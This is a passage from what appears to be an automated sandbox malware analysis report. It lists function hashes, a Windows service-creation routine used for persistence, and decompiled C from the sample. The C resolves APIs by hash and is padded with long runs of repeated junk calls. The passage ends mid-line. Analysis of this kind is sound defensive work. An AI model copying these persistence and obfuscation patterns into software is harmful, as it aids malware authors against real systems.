                                                                              • Opcode ID: 429f6382153dc853c8719f0154c2b7549c32841e49e03fb853efecb4a68c4e9b
                                                                              • Instruction ID: b01d46a8979ad7395715aec98bfef707aa02e738c8f827b893145a8ecd8b57e1
                                                                              • Opcode Fuzzy Hash: 429f6382153dc853c8719f0154c2b7549c32841e49e03fb853efecb4a68c4e9b
                                                                              • Instruction Fuzzy Hash: FF41B471E20226BBDB15DBD4EC89FAEB7BDEF48300F100529F905E6184DB71AE148B64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222E138, Relevance: 12.1, APIs: 8, Instructions: 84serviceCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0222E14F
                                                                              • _snwprintf.NTDLL ref: 0222E183
                                                                              • CreateServiceW.ADVAPI32(00000000,02233C10,02233C10,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0222E1AE
                                                                              • OpenServiceW.ADVAPI32(00000000,02233C10,00000010), ref: 0222E1C2
                                                                              • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 0222E1E0
                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0222E1F5
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0222E1FE
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0222E20C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 2587423728-0
                                                                              • Opcode ID: cdc5cad71ae0ef362aa2a3e5e9380d9669f46e006624cf398a0e00f4afb21f89
                                                                              • Instruction ID: 1ebe702712de822d74df804cb4b0e9a0936b9d2f33a41d9d4943aee69b22b642
                                                                              • Opcode Fuzzy Hash: cdc5cad71ae0ef362aa2a3e5e9380d9669f46e006624cf398a0e00f4afb21f89
                                                                              • Instruction Fuzzy Hash: 8E215B71E50324B7D72067E4AC4DFAF366DDB84700F000964FD07E324ACEB19E2496A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040215A, Relevance: 6.1, APIs: 1, Strings: 1, Instructions: 2553COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E0040215A(intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v72;
				intOrPtr _v76;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t492;
				signed int _t999;
				void* _t1004;
				intOrPtr* _t1009;
				void* _t1011;
				intOrPtr* _t1012;

				_v12 = 0;
				_v20 = _a8;
				_t39 = E00401693(0xb501f44f); // executed
				_v44 = _t39;
				 *_t1012 = 0x6e4a8109; // executed
				_t40 = E00401693(); // executed
				_v72 = _t40;
				_v76 = E00401693(0xdeab3bad);
				_t42 = E00401693(0x314ddd2f); // executed
				_t1009 = _t42; // executed
				_t43 = E00401693(0x7ec5b1a5); // executed
				_v40 = _t43;
				_t44 = E00401693(0xdc0a3126); // executed
				_v36 = _t44;
				_t45 = E00401693(0xb3089a5a); // executed
				_v32 = _t45;
				_t46 = E00401693(0x46b87f17); // executed
				_v28 = _t46;
				_t48 =  *_t1009( &_v8, 0, 0, 1, 0); // executed
				if(_t48 != 0) {
					L3:
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push( &_v16);
					_push(0);
					_push(0);
					_push(0x8003);
					_push(_v8);
					if(_v36() != 0) {
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						__eflags = _v32(_v16, _a12, 0x2c, 1, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8);
						if(__eflags == 0) {
							goto L4;
						}
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						__eflags = _v28(_v8,  *0x4560d0, _v16, 1,  &_v24, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 